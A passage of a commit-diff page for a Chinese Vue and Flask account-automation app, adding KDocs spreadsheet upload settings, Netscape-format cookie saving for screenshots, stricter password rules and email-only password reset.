<el-tag v-else type="info">干净</el-tag>
</el-descriptions-item>
<el-descriptions-item label="最近检查时间">
{{ updateStatus?.checked_at || '-' }}
</el-descriptions-item>
<el-descriptions-item v-if="updateStatus?.error" label="检查错误">
{{ updateStatus?.error }}
</el-descriptions-item>
</el-descriptions>
<el-form-item label="默认县区">
<el-input v-model="kdocsDefaultUnit" placeholder="如:道县(用户可覆盖)" />
</el-form-item>
<div class="row-actions" style="align-items: center">
<el-checkbox v-model="updateBuildNoCache">强制重建--no-cache</el-checkbox>
<div class="help" style="margin-top: 0">依赖变更或构建异常时建议开启更新会更慢</div>
</div>
<el-form-item label="Sheet名称">
<el-input v-model="kdocsSheetName" placeholder="留空使用第一个Sheet" />
</el-form-item>
<el-form-item label="Sheet序号">
<el-input-number v-model="kdocsSheetIndex" :min="0" :max="50" />
<div class="help">0 表示第一个Sheet</div>
</el-form-item>
<el-form-item label="县区列">
<el-input v-model="kdocsUnitColumn" placeholder="A" style="max-width: 120px" />
</el-form-item>
<el-form-item label="图片列">
<el-input v-model="kdocsImageColumn" placeholder="D" style="max-width: 120px" />
</el-form-item>
<el-form-item label="管理员通知">
<el-switch v-model="kdocsAdminNotifyEnabled" />
</el-form-item>
<el-form-item label="通知邮箱">
<el-input v-model="kdocsAdminNotifyEmail" placeholder="admin@example.com" />
</el-form-item>
</el-form>
<div class="row-actions">
<el-button @click="loadUpdateInfo" :disabled="updateActionLoading">刷新更新信息</el-button>
<el-button @click="onCheckUpdate" :loading="updateActionLoading">检查更新</el-button>
<el-button type="danger" @click="onRunUpdate" :loading="updateActionLoading" :disabled="!updateStatus?.update_available">
一键更新
<el-button type="primary" @click="saveKdocsConfig">保存表格配置</el-button>
<el-button
:loading="kdocsStatusLoading"
:disabled="kdocsActionBusy && !kdocsStatusLoading"
@click="refreshKdocsStatus"
>
刷新状态
</el-button>
<el-button
type="success"
plain
:loading="kdocsQrLoading"
:disabled="kdocsActionBusy && !kdocsQrLoading"
@click="onFetchKdocsQr"
>
获取二维码
</el-button>
<el-button
type="danger"
plain
:loading="kdocsClearLoading"
:disabled="kdocsActionBusy && !kdocsClearLoading"
@click="onClearKdocsLogin"
>
清除登录
</el-button>
</div>
<el-divider content-position="left">最近一次更新结果</el-divider>
<el-descriptions v-if="updateResult" border :column="1" size="small" style="margin-bottom: 10px">
<el-descriptions-item label="job_id">{{ updateResult.job_id }}</el-descriptions-item>
<el-descriptions-item label="状态">
<el-tag v-if="updateResult.status === 'running'" type="warning">运行中</el-tag>
<el-tag v-else-if="updateResult.status === 'success'" type="success">成功</el-tag>
<el-tag v-else type="danger">失败</el-tag>
</el-descriptions-item>
<el-descriptions-item label="阶段">{{ updateResult.stage || '-' }}</el-descriptions-item>
<el-descriptions-item label="开始时间">{{ updateResult.started_at || '-' }}</el-descriptions-item>
<el-descriptions-item label="结束时间">{{ updateResult.finished_at || '-' }}</el-descriptions-item>
<el-descriptions-item label="耗时(秒)">{{ updateResult.duration_seconds ?? '-' }}</el-descriptions-item>
<el-descriptions-item label="更新前(commit)">{{ shortCommit(updateResult.from_commit) }}</el-descriptions-item>
<el-descriptions-item label="更新后(commit)">{{ shortCommit(updateResult.to_commit) }}</el-descriptions-item>
<el-descriptions-item label="健康检查">
<span v-if="updateResult.health_ok === true">通过{{ updateResult.health_message }}</span>
<span v-else-if="updateResult.health_ok === false">失败{{ updateResult.health_message }}</span>
<span v-else>-</span>
</el-descriptions-item>
<el-descriptions-item v-if="updateResult.error" label="错误">{{ updateResult.error }}</el-descriptions-item>
</el-descriptions>
<div v-else class="help">暂无更新记录</div>
<el-divider content-position="left">更新日志</el-divider>
<div class="help" v-if="updateLogTruncated">日志过长仅展示末尾内容</div>
<el-input v-model="updateLog" type="textarea" :rows="10" readonly placeholder="暂无日志" />
<div class="help">
登录状态
<span v-if="kdocsStatus.last_login_ok === true">已登录</span>
<span v-else-if="kdocsStatus.login_required">需要扫码</span>
<span v-else>未知</span>
· 待上传 {{ kdocsStatus.queue_size || 0 }}
<span v-if="kdocsStatus.last_error">· 最近错误{{ kdocsStatus.last_error }}</span>
</div>
<div v-if="kdocsActionHint" class="help">操作提示{{ kdocsActionHint }}</div>
</el-card>
<el-dialog v-model="kdocsQrOpen" title="扫码登录" width="min(420px, 92vw)">
<div class="kdocs-qr">
<img v-if="kdocsQrImage" :src="`data:image/png;base64,${kdocsQrImage}`" alt="KDocs QR" />
<div class="help">请使用管理员微信扫码登录</div>
</div>
</el-dialog>
</div>
</template>
@@ -561,6 +641,22 @@ onBeforeUnmount(stopUpdatePolling)
font-weight: 800;
}
.kdocs-qr {
display: flex;
flex-direction: column;
align-items: center;
gap: 12px;
}
.kdocs-qr img {
width: 260px;
max-width: 100%;
border: 1px solid var(--app-border);
border-radius: 8px;
padding: 8px;
background: #fff;
}
.help {
margin-top: 6px;
font-size: 12px;

View File

@@ -11,19 +11,14 @@ import {
removeUserVip,
setUserVip,
} from '../api/users'
import { approvePasswordReset, fetchPasswordResets, rejectPasswordReset } from '../api/passwordResets'
import { parseSqliteDateTime } from '../utils/datetime'
import { validatePasswordStrength } from '../utils/password'
const refreshStats = inject('refreshStats', null)
const refreshNavBadges = inject('refreshNavBadges', null)
const loading = ref(false)
const users = ref([])
const resetLoading = ref(false)
const passwordResets = ref([])
function isVip(user) {
const expire = user?.vip_expire_time
if (!expire) return false
@@ -58,21 +53,8 @@ async function loadUsers() {
}
}
async function loadResets() {
resetLoading.value = true
try {
const list = await fetchPasswordResets()
passwordResets.value = Array.isArray(list) ? list : []
} catch {
passwordResets.value = []
} finally {
resetLoading.value = false
}
}
async function refreshAll() {
await Promise.all([loadUsers(), loadResets()])
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
await loadUsers()
}
async function onEnableUser(row) {
@@ -117,48 +99,6 @@ async function onDisableUser(row) {
}
}
async function onApproveReset(row) {
try {
await ElMessageBox.confirm(`确定批准「${row.username}」的密码重置申请吗?`, '批准重置', {
confirmButtonText: '批准',
cancelButtonText: '取消',
type: 'success',
})
} catch {
return
}
try {
const res = await approvePasswordReset(row.id)
ElMessage.success(res?.message || '密码重置申请已批准')
await loadResets()
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
} catch {
// handled by interceptor
}
}
async function onRejectReset(row) {
try {
await ElMessageBox.confirm(`确定拒绝「${row.username}」的密码重置申请吗?`, '拒绝重置', {
confirmButtonText: '拒绝',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
const res = await rejectPasswordReset(row.id)
ElMessage.success(res?.message || '密码重置申请已拒绝')
await loadResets()
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
} catch {
// handled by interceptor
}
}
async function onDelete(row) {
try {
await ElMessageBox.confirm(
@@ -338,27 +278,6 @@ onMounted(refreshAll)
</el-table>
</div>
</el-card>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<h3 class="section-title">密码重置申请</h3>
<div class="table-wrap">
<el-table :data="passwordResets" v-loading="resetLoading" style="width: 100%">
<el-table-column prop="id" label="申请ID" width="90" />
<el-table-column prop="username" label="用户名" min-width="200" />
<el-table-column prop="email" label="邮箱" min-width="220">
<template #default="{ row }">{{ row.email || '-' }}</template>
</el-table-column>
<el-table-column prop="created_at" label="申请时间" min-width="180" />
<el-table-column label="操作" width="180" fixed="right">
<template #default="{ row }">
<el-button type="success" size="small" @click="onApproveReset(row)">批准</el-button>
<el-button type="danger" size="small" @click="onRejectReset(row)">拒绝</el-button>
</template>
</el-table-column>
</el-table>
</div>
<div class="help app-muted">当未启用邮件找回密码时用户会提交申请由管理员在此处处理</div>
</el-card>
</div>
</template>

View File

@@ -8,6 +8,7 @@ const FeedbacksPage = () => import('../pages/FeedbacksPage.vue')
const LogsPage = () => import('../pages/LogsPage.vue')
const AnnouncementsPage = () => import('../pages/AnnouncementsPage.vue')
const EmailPage = () => import('../pages/EmailPage.vue')
const SecurityPage = () => import('../pages/SecurityPage.vue')
const SystemPage = () => import('../pages/SystemPage.vue')
const SettingsPage = () => import('../pages/SettingsPage.vue')
@@ -25,6 +26,7 @@ const routes = [
{ path: '/logs', name: 'logs', component: LogsPage },
{ path: '/announcements', name: 'announcements', component: AnnouncementsPage },
{ path: '/email', name: 'email', component: EmailPage },
{ path: '/security', name: 'security', component: SecurityPage },
{ path: '/system', name: 'system', component: SystemPage },
{ path: '/settings', name: 'settings', component: SettingsPage },
],

View File

@@ -2,7 +2,7 @@
# -*- coding: utf-8 -*-
"""
API 浏览器 - 用纯 HTTP 请求实现浏览功能
Playwright 快 30-60 倍
传统浏览器自动化快 30-60 倍
"""
import requests
@@ -44,6 +44,27 @@ except Exception:
_API_DIAGNOSTIC_SLOW_MS = max(0, _API_DIAGNOSTIC_SLOW_MS)
_cookie_domain_fallback = urlsplit(BASE_URL).hostname or "postoa.aidunsoft.com"
_COOKIE_JAR_MAX_AGE_SECONDS = 24 * 60 * 60
def get_cookie_jar_path(username: str) -> str:
"""获取截图用的 cookies 文件路径Netscape Cookie 格式)"""
import hashlib
os.makedirs(COOKIES_DIR, exist_ok=True)
filename = hashlib.sha256(username.encode()).hexdigest()[:32] + ".cookies.txt"
return os.path.join(COOKIES_DIR, filename)
def is_cookie_jar_fresh(cookie_path: str, max_age_seconds: int = _COOKIE_JAR_MAX_AGE_SECONDS) -> bool:
"""判断 cookies 文件是否存在且未过期"""
if not cookie_path or not os.path.exists(cookie_path):
return False
try:
file_age = time.time() - os.path.getmtime(cookie_path)
return file_age <= max(0, int(max_age_seconds or 0))
except Exception:
return False
_api_browser_instances: "weakref.WeakSet[APIBrowser]" = weakref.WeakSet()
@@ -102,37 +123,36 @@ class APIBrowser:
"""记录日志"""
if self.log_callback:
self.log_callback(message)
def save_cookies_for_playwright(self, username: str):
"""保存cookies供Playwright使用"""
import os
import json
import hashlib
os.makedirs(COOKIES_DIR, exist_ok=True)
# 安全修复使用SHA256代替MD5作为文件名哈希
filename = hashlib.sha256(username.encode()).hexdigest()[:32] + '.json'
cookies_path = os.path.join(COOKIES_DIR, filename)
def save_cookies_for_screenshot(self, username: str):
"""保存 cookies 供 wkhtmltoimage 使用Netscape Cookie 格式)"""
cookies_path = get_cookie_jar_path(username)
try:
# 获取requests session的cookies
cookies_list = []
lines = [
"# Netscape HTTP Cookie File",
"# This file was generated by zsglpt",
]
for cookie in self.session.cookies:
cookies_list.append({
'name': cookie.name,
'value': cookie.value,
'domain': cookie.domain or _cookie_domain_fallback,
'path': cookie.path or '/',
})
domain = cookie.domain or _cookie_domain_fallback
include_subdomains = "TRUE" if domain.startswith(".") else "FALSE"
path = cookie.path or "/"
secure = "TRUE" if getattr(cookie, "secure", False) else "FALSE"
expires = int(getattr(cookie, "expires", 0) or 0)
lines.append(
"\t".join(
[
domain,
include_subdomains,
path,
secure,
str(expires),
cookie.name,
cookie.value,
]
)
)
# Playwright storage_state 格式
storage_state = {
'cookies': cookies_list,
'origins': []
}
with open(cookies_path, 'w', encoding='utf-8') as f:
json.dump(storage_state, f)
with open(cookies_path, "w", encoding="utf-8") as f:
f.write("\n".join(lines) + "\n")
self.log(f"[API] Cookies已保存供截图使用")
return True

View File

@@ -30,11 +30,6 @@ export async function forgotPassword(payload) {
return data
}
export async function requestPasswordReset(payload) {
const { data } = await publicApi.post('/reset_password_request', payload)
return data
}
export async function confirmPasswordReset(payload) {
const { data } = await publicApi.post('/reset-password-confirm', payload)
return data

View File

@@ -30,3 +30,12 @@ export async function changePassword(payload) {
return data
}
export async function fetchKdocsSettings() {
const { data } = await publicApi.get('/user/kdocs')
return data
}
export async function updateKdocsSettings(payload) {
const { data } = await publicApi.post('/user/kdocs', payload)
return data
}

View File

@@ -11,10 +11,13 @@ import {
changePassword,
fetchEmailNotify,
fetchUserEmail,
fetchKdocsSettings,
unbindEmail,
updateKdocsSettings,
updateEmailNotify,
} from '../api/settings'
import { useUserStore } from '../stores/user'
import { validateStrongPassword } from '../utils/password'
const route = useRoute()
const router = useRouter()
@@ -28,6 +31,56 @@ const announcementOpen = ref(false)
const announcement = ref(null)
const announcementLoading = ref(false)
const announcementPageToken = (() => {
try {
const timeOrigin = window.performance?.timeOrigin
if (typeof timeOrigin === 'number' && Number.isFinite(timeOrigin)) return String(timeOrigin)
} catch {
// ignore
}
return String(Date.now())
})()
function announcementOnceKey(announcementId) {
return `announcement_closed_once_${announcementId}`
}
function announcementPermanentKey(announcementId) {
return `announcement_closed_${announcementId}`
}
function wasAnnouncementClosedOnce(announcementId) {
try {
return window.sessionStorage.getItem(announcementOnceKey(announcementId)) === announcementPageToken
} catch {
return false
}
}
function wasAnnouncementClosedPermanently(announcementId) {
try {
return window.localStorage.getItem(announcementPermanentKey(announcementId)) === '1'
} catch {
return false
}
}
function markAnnouncementClosedOnce(announcementId) {
try {
window.sessionStorage.setItem(announcementOnceKey(announcementId), announcementPageToken)
} catch {
// ignore
}
}
function markAnnouncementClosedPermanently(announcementId) {
try {
window.localStorage.setItem(announcementPermanentKey(announcementId), '1')
} catch {
// ignore
}
}
const feedbackOpen = ref(false)
const feedbackTab = ref('new')
const feedbackSubmitting = ref(false)
@@ -60,6 +113,10 @@ const passwordForm = reactive({
confirm_password: '',
})
const kdocsLoading = ref(false)
const kdocsSaving = ref(false)
const kdocsUnitValue = ref('')
function syncIsMobile() {
isMobile.value = Boolean(mediaQuery?.matches)
if (!isMobile.value) drawerOpen.value = false
@@ -180,7 +237,7 @@ async function openSettings() {
}
async function loadSettings() {
await Promise.all([loadEmailInfo(), loadEmailNotify()])
await Promise.all([loadEmailInfo(), loadEmailNotify(), loadKdocsSettings()])
}
async function loadEmailInfo() {
@@ -211,6 +268,30 @@ async function loadEmailNotify() {
}
}
async function loadKdocsSettings() {
kdocsLoading.value = true
try {
const data = await fetchKdocsSettings()
kdocsUnitValue.value = data?.kdocs_unit || ''
} catch {
kdocsUnitValue.value = ''
} finally {
kdocsLoading.value = false
}
}
async function saveKdocsSettings() {
kdocsSaving.value = true
try {
await updateKdocsSettings({ kdocs_unit: kdocsUnitValue.value.trim() })
ElMessage.success('已更新表格县区设置')
} catch {
// handled by interceptor
} finally {
kdocsSaving.value = false
}
}
async function onBindEmail() {
const email = bindEmailValue.value.trim().toLowerCase()
if (!email) {
@@ -292,8 +373,9 @@ async function onChangePassword() {
ElMessage.error('请填写完整信息')
return
}
if (String(newPassword).length < 6) {
ElMessage.error('新密码至少6位')
const passwordCheck = validateStrongPassword(newPassword)
if (!passwordCheck.ok) {
ElMessage.error(passwordCheck.message)
return
}
if (newPassword !== confirmPassword) {
@@ -327,8 +409,8 @@ async function loadAnnouncement() {
const ann = data?.announcement
if (!ann?.id) return
const sessionKey = `announcement_closed_${ann.id}`
if (window.sessionStorage.getItem(sessionKey) === '1') return
if (wasAnnouncementClosedPermanently(ann.id)) return
if (wasAnnouncementClosedOnce(ann.id)) return
announcement.value = ann
announcementOpen.value = true
@@ -341,7 +423,7 @@ async function loadAnnouncement() {
function closeAnnouncementOnce() {
const ann = announcement.value
if (ann?.id) window.sessionStorage.setItem(`announcement_closed_${ann.id}`, '1')
if (ann?.id) markAnnouncementClosedOnce(ann.id)
announcementOpen.value = false
}
@@ -351,6 +433,7 @@ async function dismissAnnouncementPermanently() {
announcementOpen.value = false
return
}
markAnnouncementClosedPermanently(ann.id)
try {
const res = await dismissAnnouncement(ann.id)
if (res?.success) ElMessage.success('已永久关闭')
@@ -433,6 +516,9 @@ async function dismissAnnouncementPermanently() {
<el-dialog v-model="announcementOpen" width="min(560px, 92vw)" :title="announcement?.title || '系统公告'">
<div class="announcement-body" v-loading="announcementLoading">
<div class="announcement-content">{{ announcement?.content || '' }}</div>
<div v-if="announcement?.image_url" class="announcement-image">
<img :src="announcement.image_url" alt="公告图片" loading="lazy" />
</div>
</div>
<template #footer>
<el-button @click="closeAnnouncementOnce">当次关闭</el-button>
@@ -562,7 +648,7 @@ async function dismissAnnouncementPermanently() {
<el-form-item label="当前密码">
<el-input v-model="passwordForm.current_password" type="password" show-password autocomplete="current-password" />
</el-form-item>
<el-form-item label="新密码(至少6位">
<el-form-item label="新密码(至少8位且包含字母和数字">
<el-input v-model="passwordForm.new_password" type="password" show-password autocomplete="new-password" />
</el-form-item>
<el-form-item label="确认新密码">
@@ -579,6 +665,24 @@ async function dismissAnnouncementPermanently() {
</div>
</el-tab-pane>
<el-tab-pane label="表格上传" name="kdocs">
<div v-loading="kdocsLoading" class="settings-section">
<el-form label-position="top">
<el-form-item label="县区(可选)">
<el-input v-model="kdocsUnitValue" placeholder="留空使用系统默认县区" />
</el-form-item>
<el-button type="primary" :loading="kdocsSaving" @click="saveKdocsSettings">保存</el-button>
</el-form>
<el-alert
type="info"
:closable="false"
title="自动上传开关在“账号管理”页面设置(测试功能)。"
show-icon
class="settings-hint"
/>
</div>
</el-tab-pane>
<el-tab-pane label="VIP信息" name="vip">
<div class="settings-section">
<el-alert
@@ -726,6 +830,20 @@ async function dismissAnnouncementPermanently() {
font-size: 14px;
}
.announcement-image {
margin-top: 12px;
display: flex;
justify-content: center;
}
.announcement-image img {
max-width: 100%;
max-height: 320px;
border-radius: 10px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.feedback-title {
display: flex;
align-items: center;

View File

@@ -15,6 +15,7 @@ import {
updateAccount,
updateAccountRemark,
} from '../api/accounts'
import { fetchKdocsSettings, updateKdocsSettings } from '../api/settings'
import { fetchRunStats } from '../api/stats'
import { useSocket } from '../composables/useSocket'
import { useUserStore } from '../stores/user'
@@ -57,6 +58,9 @@ watch(batchEnableScreenshot, (value) => {
}
})
const kdocsAutoUpload = ref(false)
const kdocsSettingsLoading = ref(false)
const addOpen = ref(false)
const editOpen = ref(false)
const upgradeOpen = ref(false)
@@ -189,6 +193,30 @@ async function refreshAccounts() {
}
}
async function loadKdocsSettings() {
kdocsSettingsLoading.value = true
try {
const data = await fetchKdocsSettings()
kdocsAutoUpload.value = Number(data?.kdocs_auto_upload || 0) === 1
} catch {
kdocsAutoUpload.value = false
} finally {
kdocsSettingsLoading.value = false
}
}
async function onToggleKdocsAutoUpload(value) {
kdocsSettingsLoading.value = true
try {
await updateKdocsSettings({ kdocs_auto_upload: value ? 1 : 0 })
ElMessage.success(value ? '已开启自动上传(测试)' : '已关闭自动上传')
} catch (e) {
kdocsAutoUpload.value = !value
} finally {
kdocsSettingsLoading.value = false
}
}
async function onStart(acc) {
try {
await startAccount(acc.id, { browse_type: browseTypeById[acc.id] || '应读', enable_screenshot: batchEnableScreenshot.value })
@@ -524,6 +552,7 @@ onMounted(async () => {
unbindSocket = bindSocket()
await refreshAccounts()
await loadKdocsSettings()
await refreshStats()
syncStatsPolling()
})
@@ -612,6 +641,15 @@ onBeforeUnmount(() => {
<el-option v-for="opt in browseTypeOptions" :key="opt.value" :label="opt.label" :value="opt.value" />
</el-select>
<el-switch v-model="batchEnableScreenshot" inline-prompt active-text="截图" inactive-text="不截图" />
<el-switch
v-model="kdocsAutoUpload"
:disabled="kdocsSettingsLoading"
inline-prompt
active-text="上传"
inactive-text="不传"
@change="onToggleKdocsAutoUpload"
/>
<span class="app-muted">表格(测试)</span>
</div>
<div class="toolbar-right">

View File

@@ -8,10 +8,8 @@ import {
forgotPassword,
generateCaptcha,
login,
requestPasswordReset,
resendVerifyEmail,
} from '../api/auth'
import { validateStrongPassword } from '../utils/password'
const router = useRouter()
@@ -32,20 +30,14 @@ const registerVerifyEnabled = ref(false)
const forgotOpen = ref(false)
const resendOpen = ref(false)
const emailResetForm = reactive({
email: '',
const forgotForm = reactive({
username: '',
captcha: '',
})
const emailResetCaptchaImage = ref('')
const emailResetCaptchaSession = ref('')
const emailResetLoading = ref(false)
const manualResetForm = reactive({
username: '',
email: '',
new_password: '',
})
const manualResetLoading = ref(false)
const forgotCaptchaImage = ref('')
const forgotCaptchaSession = ref('')
const forgotLoading = ref(false)
const forgotHint = ref('')
const resendForm = reactive({
email: '',
@@ -72,12 +64,12 @@ async function refreshLoginCaptcha() {
async function refreshEmailResetCaptcha() {
try {
const data = await generateCaptcha()
emailResetCaptchaSession.value = data?.session_id || ''
emailResetCaptchaImage.value = data?.captcha_image || ''
emailResetForm.captcha = ''
forgotCaptchaSession.value = data?.session_id || ''
forgotCaptchaImage.value = data?.captcha_image || ''
forgotForm.captcha = ''
} catch {
emailResetCaptchaSession.value = ''
emailResetCaptchaImage.value = ''
forgotCaptchaSession.value = ''
forgotCaptchaImage.value = ''
}
}
@@ -113,8 +105,14 @@ async function onSubmit() {
need_captcha: needCaptcha.value,
})
ElMessage.success('登录成功,正在跳转...')
const urlParams = new URLSearchParams(window.location.search || '')
const next = String(urlParams.get('next') || '').trim()
const safeNext = next && next.startsWith('/') && !next.startsWith('//') && !next.startsWith('/\\') ? next : ''
setTimeout(() => {
window.location.href = '/app'
const target = safeNext || '/app'
router.push(target).catch(() => {
window.location.href = target
})
}, 300)
} catch (e) {
const status = e?.response?.status
@@ -136,36 +134,38 @@ async function onSubmit() {
async function openForgot() {
forgotOpen.value = true
forgotHint.value = ''
forgotForm.username = ''
forgotForm.captcha = ''
if (emailEnabled.value) {
emailResetForm.email = ''
emailResetForm.captcha = ''
await refreshEmailResetCaptcha()
} else {
manualResetForm.username = ''
manualResetForm.email = ''
manualResetForm.new_password = ''
}
}
async function submitForgot() {
if (emailEnabled.value) {
const email = emailResetForm.email.trim()
if (!email) {
ElMessage.error('请输入邮箱')
forgotHint.value = ''
if (!emailEnabled.value) {
ElMessage.warning('邮件功能未启用,请联系管理员重置密码。')
return
}
if (!emailResetForm.captcha.trim()) {
const username = forgotForm.username.trim()
if (!username) {
ElMessage.error('请输入用户名')
return
}
if (!forgotForm.captcha.trim()) {
ElMessage.error('请输入验证码')
return
}
emailResetLoading.value = true
forgotLoading.value = true
try {
const res = await forgotPassword({
email,
captcha_session: emailResetCaptchaSession.value,
captcha: emailResetForm.captcha.trim(),
username,
captcha_session: forgotCaptchaSession.value,
captcha: forgotForm.captcha.trim(),
})
ElMessage.success(res?.message || '已发送重置邮件')
setTimeout(() => {
@@ -173,43 +173,15 @@ async function submitForgot() {
}, 800)
} catch (e) {
const data = e?.response?.data
ElMessage.error(data?.error || '发送失败')
const message = data?.error || '发送失败'
if (data?.code === 'email_not_bound') {
forgotHint.value = message
} else {
ElMessage.error(message)
}
await refreshEmailResetCaptcha()
} finally {
emailResetLoading.value = false
}
return
}
const username = manualResetForm.username.trim()
const newPassword = manualResetForm.new_password
if (!username || !newPassword) {
ElMessage.error('用户名和新密码不能为空')
return
}
const check = validateStrongPassword(newPassword)
if (!check.ok) {
ElMessage.error(check.message)
return
}
manualResetLoading.value = true
try {
await requestPasswordReset({
username,
email: manualResetForm.email.trim(),
new_password: newPassword,
})
ElMessage.success('申请已提交,请等待审核')
setTimeout(() => {
forgotOpen.value = false
}, 800)
} catch (e) {
const data = e?.response?.data
ElMessage.error(data?.error || '提交失败')
} finally {
manualResetLoading.value = false
forgotLoading.value = false
}
}
@@ -320,19 +292,42 @@ onMounted(async () => {
</el-card>
<el-dialog v-model="forgotOpen" title="找回密码" width="min(560px, 92vw)">
<template v-if="emailEnabled">
<el-alert type="info" :closable="false" title="输入注册邮箱,我们将发送重置链接。" show-icon />
<el-alert
v-if="!emailEnabled"
type="warning"
:closable="false"
title="邮件功能未启用"
description="无法通过邮箱找回密码,请联系管理员重置密码。"
show-icon
/>
<el-alert
v-else
type="info"
:closable="false"
title="通过邮箱找回密码"
description="输入用户名并完成验证码,我们将向该账号绑定的邮箱发送重置链接。"
show-icon
/>
<el-alert
v-if="forgotHint"
type="warning"
:closable="false"
title="无法通过邮箱找回密码"
:description="forgotHint"
show-icon
class="alert"
/>
<el-form label-position="top" class="dialog-form">
<el-form-item label="邮箱">
<el-input v-model="emailResetForm.email" placeholder="name@example.com" />
<el-form-item label="用户名">
<el-input v-model="forgotForm.username" placeholder="请输入用户名" />
</el-form-item>
<el-form-item label="验证码">
<div class="captcha-row">
<el-input v-model="emailResetForm.captcha" placeholder="请输入验证码" />
<el-input v-model="forgotForm.captcha" placeholder="请输入验证码" />
<img
v-if="emailResetCaptchaImage"
v-if="forgotCaptchaImage"
class="captcha-img"
:src="emailResetCaptchaImage"
:src="forgotCaptchaImage"
alt="验证码"
title="点击刷新"
@click="refreshEmailResetCaptcha"
@@ -341,30 +336,11 @@ onMounted(async () => {
</div>
</el-form-item>
</el-form>
</template>
<template v-else>
<el-alert type="warning" :closable="false" title="邮件功能未启用:提交申请后等待管理员审核。" show-icon />
<el-form label-position="top" class="dialog-form">
<el-form-item label="用户名">
<el-input v-model="manualResetForm.username" placeholder="请输入用户名" />
</el-form-item>
<el-form-item label="邮箱(可选)">
<el-input v-model="manualResetForm.email" placeholder="可选填写邮箱" />
</el-form-item>
<el-form-item label="新密码至少8位且包含字母和数字">
<el-input v-model="manualResetForm.new_password" type="password" show-password placeholder="请输入新密码" />
</el-form-item>
</el-form>
</template>
<template #footer>
<el-button @click="forgotOpen = false">取消</el-button>
<el-button
type="primary"
:loading="emailEnabled ? emailResetLoading : manualResetLoading"
@click="submitForgot"
>
{{ emailEnabled ? '发送重置邮件' : '提交申请' }}
<el-button type="primary" :loading="forgotLoading" :disabled="!emailEnabled" @click="submitForgot">
发送重置邮件
</el-button>
</template>
</el-dialog>

View File

@@ -4,6 +4,7 @@ import { useRouter } from 'vue-router'
import { ElMessage } from 'element-plus'
import { fetchEmailVerifyStatus, generateCaptcha, register } from '../api/auth'
import { validateStrongPassword } from '../utils/password'
const router = useRouter()
@@ -68,8 +69,9 @@ async function onSubmit() {
ElMessage.error(errorText.value)
return
}
if (password.length < 6) {
errorText.value = '密码至少6个字符'
const passwordCheck = validateStrongPassword(password)
if (!passwordCheck.ok) {
errorText.value = passwordCheck.message || '密码格式不正确'
ElMessage.error(errorText.value)
return
}
@@ -166,10 +168,10 @@ onMounted(async () => {
v-model="form.password"
type="password"
show-password
placeholder="至少6个字符"
placeholder="至少8位且包含字母和数字"
autocomplete="new-password"
/>
<div class="hint app-muted">至少6个字符</div>
<div class="hint app-muted">至少8位且包含字母和数字</div>
</el-form-item>
<el-form-item label="确认密码 *">
<el-input

21
app.py
View File

@@ -32,9 +32,9 @@ from browser_pool_worker import init_browser_worker_pool, shutdown_browser_worke
from realtime.socketio_handlers import register_socketio_handlers
from realtime.status_push import status_push_worker
from routes import register_blueprints
from services.browser_manager import init_browser_manager
from security import init_security_middleware
from services.checkpoints import init_checkpoint_manager
from services.maintenance import start_cleanup_scheduler
from services.maintenance import start_cleanup_scheduler, start_kdocs_monitor
from services.models import User
from services.runtime import init_runtime
from services.scheduler import scheduled_task_worker
@@ -98,6 +98,9 @@ init_logging(log_level=config.LOG_LEVEL, log_file=config.LOG_FILE)
logger = get_logger("app")
init_runtime(socketio=socketio, logger=logger)
# 初始化安全中间件(需在其他中间件/Blueprint 之前注册)
init_security_middleware(app)
# 注册 Blueprint路由不变
register_blueprints(app)
@@ -195,7 +198,7 @@ def cleanup_on_exit():
except Exception:
pass
logger.info("- 关闭浏览器线程池...")
logger.info("- 关闭截图线程池...")
try:
shutdown_browser_worker_pool()
except Exception:
@@ -264,6 +267,7 @@ if __name__ == "__main__":
logger.warning(f"警告: 邮件服务初始化失败: {e}")
start_cleanup_scheduler()
start_kdocs_monitor()
try:
system_config = database.get_system_config() or {}
@@ -274,15 +278,6 @@ if __name__ == "__main__":
except Exception as e:
logger.warning(f"警告: 加载并发配置失败,使用默认值: {e}")
logger.info("正在初始化浏览器管理器...")
try:
from services.browser_manager import init_browser_manager_async
logger.info("启动浏览器环境初始化(后台进行,不阻塞服务启动)...")
init_browser_manager_async()
except Exception as e:
logger.warning(f"警告: 启动浏览器初始化失败: {e}")
logger.info("启动定时任务调度器...")
threading.Thread(target=scheduled_task_worker, daemon=True, name="scheduled-task-worker").start()
logger.info("✓ 定时任务调度器已启动")
@@ -301,7 +296,7 @@ if __name__ == "__main__":
except Exception:
pool_size = 3
try:
logger.info(f"初始化截图线程池({pool_size}个worker按需启动浏览器空闲5分钟后自动关闭...")
logger.info(f"初始化截图线程池({pool_size}个worker按需启动执行环境空闲5分钟后自动释放...")
init_browser_worker_pool(pool_size=pool_size)
logger.info("✓ 截图线程池初始化完成")
except Exception as e:

View File

@@ -122,6 +122,12 @@ class Config:
# ==================== 浏览器配置 ====================
SCREENSHOTS_DIR = os.environ.get('SCREENSHOTS_DIR', '截图')
COOKIES_DIR = os.environ.get('COOKIES_DIR', 'data/cookies')
KDOCS_LOGIN_STATE_FILE = os.environ.get('KDOCS_LOGIN_STATE_FILE', 'data/kdocs_login_state.json')
# ==================== 公告图片上传配置 ====================
ANNOUNCEMENT_IMAGE_DIR = os.environ.get('ANNOUNCEMENT_IMAGE_DIR', 'static/announcements')
ALLOWED_ANNOUNCEMENT_IMAGE_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.gif', '.webp'}
MAX_ANNOUNCEMENT_IMAGE_SIZE = int(os.environ.get('MAX_ANNOUNCEMENT_IMAGE_SIZE', '5242880')) # 5MB
# ==================== 并发控制配置 ====================
MAX_CONCURRENT_GLOBAL = int(os.environ.get('MAX_CONCURRENT_GLOBAL', '2'))
@@ -206,6 +212,10 @@ class Config:
LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true'
LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600'))
ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600'))
SECURITY_ENABLED = os.environ.get('SECURITY_ENABLED', 'true').lower() == 'true'
SECURITY_LOG_LEVEL = os.environ.get('SECURITY_LOG_LEVEL', 'INFO')
